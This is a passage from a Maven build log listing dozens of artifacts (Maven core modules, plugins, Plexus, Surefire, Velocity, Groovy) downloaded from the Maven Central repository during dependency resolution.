https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/2.2.1/maven-model-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/2.2.1/maven-model-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.0/maven-model-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.0/maven-model-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-monitor/2.0.6/maven-monitor-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-monitor/2.0.6/maven-monitor-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-monitor/2.2.1/maven-monitor-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-monitor/2.2.1/maven-monitor-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/10/maven-parent-10.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/11/maven-parent-11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/15/maven-parent-15.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/16/maven-parent-16.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/22/maven-parent-22.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/23/maven-parent-23.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/25/maven-parent-25.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/30/maven-parent-30.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/31/maven-parent-31.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/32/maven-parent-32.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/33/maven-parent-33.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/34/maven-parent-34.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/35/maven-parent-35.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/37/maven-parent-37.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/39/maven-parent-39.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/42/maven-parent-42.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/5/maven-parent-5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.0.6/maven-plugin-api-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.0.6/maven-plugin-api-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.0/maven-plugin-api-2.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.2.1/maven-plugin-api-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.2.1/maven-plugin-api-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.0/maven-plugin-api-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.0/maven-plugin-api-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-descriptor/2.0.6/maven-plugin-descriptor-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-descriptor/2.0.6/maven-plugin-descriptor-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-descriptor/2.2.1/maven-plugin-descriptor-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-descriptor/2.2.1/maven-plugin-descriptor-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-parameter-documenter/2.0.6/maven-plugin-parameter-documenter-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-parameter-documenter/2.0.6/maven-plugin-parameter-documenter-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-parameter-documenter/2.2.1/maven-plugin-parameter-documenter-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-parameter-documenter/2.2.1/maven-plugin-parameter-documenter-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-registry/2.0.6/maven-plugin-registry-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-registry/2.0.6/maven-plugin-registry-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-registry/2.2.1/maven-plugin-registry-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-registry/2.2.1/maven-plugin-registry-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-profile/2.0.6/maven-profile-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-profile/2.0.6/maven-profile-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-profile/2.2.1/maven-profile-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-profile/2.2.1/maven-profile-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-project/2.0.6/maven-project-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-project/2.0.6/maven-project-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-project/2.2.1/maven-project-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-project/2.2.1/maven-project-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/2.0.6/maven-repository-metadata-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/2.0.6/maven-repository-metadata-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/2.2.1/maven-repository-metadata-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/2.2.1/maven-repository-metadata-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/3.0/maven-repository-metadata-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/3.0/maven-repository-metadata-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings-builder/3.0/maven-settings-builder-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings-builder/3.0/maven-settings-builder-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/2.0.6/maven-settings-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/2.0.6/maven-settings-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/2.2.1/maven-settings-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/2.2.1/maven-settings-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/3.0/maven-settings-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/3.0/maven-settings-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-toolchain/1.0/maven-toolchain-1.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-toolchain/1.0/maven-toolchain-1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-toolchain/2.2.1/maven-toolchain-2.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-toolchain/2.2.1/maven-toolchain-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven/2.0.6/maven-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven/2.0/maven-2.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven/2.2.1/maven-2.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven/3.0/maven-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven/3.8.8/maven-3.8.8.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugin-tools/maven-plugin-annotations/3.5.2/maven-plugin-annotations-3.5.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugin-tools/maven-plugin-annotations/3.5.2/maven-plugin-annotations-3.5.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugin-tools/maven-plugin-tools/3.5.2/maven-plugin-tools-3.5.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-clean-plugin/3.1.0/maven-clean-plugin-3.1.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-clean-plugin/3.1.0/maven-clean-plugin-3.1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-compiler-plugin/3.8.0/maven-compiler-plugin-3.8.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-compiler-plugin/3.8.0/maven-compiler-plugin-3.8.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-dependency-plugin/3.7.0/maven-dependency-plugin-3.7.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-dependency-plugin/3.7.0/maven-dependency-plugin-3.7.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-enforcer-plugin/3.5.0/maven-enforcer-plugin-3.5.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-enforcer-plugin/3.5.0/maven-enforcer-plugin-3.5.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-enforcer-plugin/maven-metadata.xml +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-jar-plugin/3.0.2/maven-jar-plugin-3.0.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-jar-plugin/3.0.2/maven-jar-plugin-3.0.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/30/maven-plugins-30.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/31/maven-plugins-31.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/32/maven-plugins-32.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/42/maven-plugins-42.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-resources-plugin/3.0.2/maven-resources-plugin-3.0.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-resources-plugin/3.0.2/maven-resources-plugin-3.0.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-surefire-plugin/2.22.1/maven-surefire-plugin-2.22.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-surefire-plugin/2.22.1/maven-surefire-plugin-2.22.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/2.0.6/maven-reporting-api-2.0.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/2.0.6/maven-reporting-api-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/3.0/maven-reporting-api-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/3.0/maven-reporting-api-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/3.1.1/maven-reporting-api-3.1.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/3.1.1/maven-reporting-api-3.1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-impl/3.2.0/maven-reporting-impl-3.2.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-impl/3.2.0/maven-reporting-impl-3.2.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting/2.0.6/maven-reporting-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/resolver/maven-resolver-api/1.4.1/maven-resolver-api-1.4.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/resolver/maven-resolver-api/1.4.1/maven-resolver-api-1.4.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/resolver/maven-resolver-util/1.4.1/maven-resolver-util-1.4.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/resolver/maven-resolver-util/1.4.1/maven-resolver-util-1.4.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/resolver/maven-resolver/1.4.1/maven-resolver-1.4.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-artifact-transfer/0.13.1/maven-artifact-transfer-0.13.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-artifact-transfer/0.13.1/maven-artifact-transfer-0.13.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-common-artifact-filters/3.1.0/maven-common-artifact-filters-3.1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-common-artifact-filters/3.3.2/maven-common-artifact-filters-3.3.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-common-artifact-filters/3.3.2/maven-common-artifact-filters-3.3.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-dependency-analyzer/1.14.1/maven-dependency-analyzer-1.14.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-dependency-analyzer/1.14.1/maven-dependency-analyzer-1.14.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-dependency-tree/3.3.0/maven-dependency-tree-3.3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-dependency-tree/3.3.0/maven-dependency-tree-3.3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-filtering/3.1.1/maven-filtering-3.1.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-filtering/3.1.1/maven-filtering-3.1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/15/maven-shared-components-15.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/18/maven-shared-components-18.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/19/maven-shared-components-19.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/21/maven-shared-components-21.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/30/maven-shared-components-30.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/33/maven-shared-components-33.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/34/maven-shared-components-34.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/37/maven-shared-components-37.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/39/maven-shared-components-39.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/42/maven-shared-components-42.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-incremental/1.1/maven-shared-incremental-1.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-incremental/1.1/maven-shared-incremental-1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/0.1/maven-shared-utils-0.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.0.0/maven-shared-utils-3.0.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.0.0/maven-shared-utils-3.0.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.0.1/maven-shared-utils-3.0.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.0.1/maven-shared-utils-3.0.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.1.0/maven-shared-utils-3.1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.2.1/maven-shared-utils-3.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.2.1/maven-shared-utils-3.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.3.4/maven-shared-utils-3.3.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.4.2/maven-shared-utils-3.4.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.4.2/maven-shared-utils-3.4.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/maven-surefire-common/2.22.1/maven-surefire-common-2.22.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/maven-surefire-common/2.22.1/maven-surefire-common-2.22.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-api/2.22.1/surefire-api-2.22.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-api/2.22.1/surefire-api-2.22.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-booter/2.22.1/surefire-booter-2.22.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-booter/2.22.1/surefire-booter-2.22.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-logger-api/2.22.1/surefire-logger-api-2.22.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-logger-api/2.22.1/surefire-logger-api-2.22.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire/2.22.1/surefire-2.22.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/velocity/velocity-tools/2.0/velocity-tools-2.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/velocity/velocity-tools/2.0/velocity-tools-2.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/velocity/velocity/1.6.2/velocity-1.6.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/velocity/velocity/1.7/velocity-1.7.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/velocity/velocity/1.7/velocity-1.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/assertj/assertj-bom/3.25.3/assertj-bom-3.25.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/groovy/groovy-xml/3.0.9/groovy-xml-3.0.9.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/groovy/groovy-xml/3.0.9/groovy-xml-3.0.9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/groovy/groovy/3.0.9/groovy-3.0.9.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/groovy/groovy/3.0.9/groovy-3.0.9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/mojo/exec-maven-plugin/1.1.1/exec-maven-plugin-1.1.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/mojo/exec-maven-plugin/1.1.1/exec-maven-plugin-1.1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/mojo/mojo-parent/20/mojo-parent-20.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/3.3/plexus-archiver-3.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/3.4/plexus-archiver-3.4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/3.4/plexus-archiver-3.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/4.9.2/plexus-archiver-4.9.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/4.9.2/plexus-archiver-4.9.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.2.3/plexus-classworlds-2.2.3.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.2.3/plexus-classworlds-2.2.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-api/2.8.4/plexus-compiler-api-2.8.4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-api/2.8.4/plexus-compiler-api-2.8.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-javac/2.8.4/plexus-compiler-javac-2.8.4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-javac/2.8.4/plexus-compiler-javac-2.8.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-manager/2.8.4/plexus-compiler-manager-2.8.4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-manager/2.8.4/plexus-compiler-manager-2.8.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler/2.8.4/plexus-compiler-2.8.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compilers/2.8.4/plexus-compilers-2.8.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.4/plexus-component-annotations-1.5.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.6/plexus-component-annotations-1.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.6/plexus-component-annotations-1.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.7.1/plexus-component-annotations-1.7.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.7.1/plexus-component-annotations-1.7.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/2.0.0/plexus-component-annotations-2.0.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/2.0.0/plexus-component-annotations-2.0.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/2.1.0/plexus-component-annotations-2.1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/1.1.12/plexus-components-1.1.12.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/1.1.14/plexus-components-1.1.14.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/1.1.18/plexus-components-1.1.18.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/1.3.1/plexus-components-1.3.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/4.0/plexus-components-4.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/6.6/plexus-components-6.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-container-default/1.0-alpha-9-stable-1/plexus-container-default-1.0-alpha-9-stable-1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-container-default/1.0-alpha-9-stable-1/plexus-container-default-1.0-alpha-9-stable-1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-container-default/1.0-alpha-9/plexus-container-default-1.0-alpha-9.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-container-default/1.0-alpha-9/plexus-container-default-1.0-alpha-9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.0.3/plexus-containers-1.0.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.5.4/plexus-containers-1.5.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.6/plexus-containers-1.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.7.1/plexus-containers-1.7.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/2.0.0/plexus-containers-2.0.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/2.1.0/plexus-containers-2.1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-i18n/1.0-beta-10/plexus-i18n-1.0-beta-10.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-i18n/1.0-beta-10/plexus-i18n-1.0-beta-10.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interactivity-api/1.0-alpha-4/plexus-interactivity-api-1.0-alpha-4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interactivity-api/1.0-alpha-4/plexus-interactivity-api-1.0-alpha-4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.11/plexus-interpolation-1.11.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.11/plexus-interpolation-1.11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.14/plexus-interpolation-1.14.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.14/plexus-interpolation-1.14.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.22/plexus-interpolation-1.22.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.24/plexus-interpolation-1.24.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.24/plexus-interpolation-1.24.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.26/plexus-interpolation-1.26.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.26/plexus-interpolation-1.26.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-io/2.7.1/plexus-io-2.7.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-io/2.7.1/plexus-io-2.7.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-io/3.4.2/plexus-io-3.4.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-io/3.4.2/plexus-io-3.4.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-java/0.9.10/plexus-java-0.9.10.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-java/0.9.10/plexus-java-0.9.10.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-languages/0.9.10/plexus-languages-0.9.10.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-resources/1.2.0/plexus-resources-1.2.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-resources/1.2.0/plexus-resources-1.2.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.0.4/plexus-utils-1.0.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.4.1/plexus-utils-1.4.1.pom +Downloaded from central: 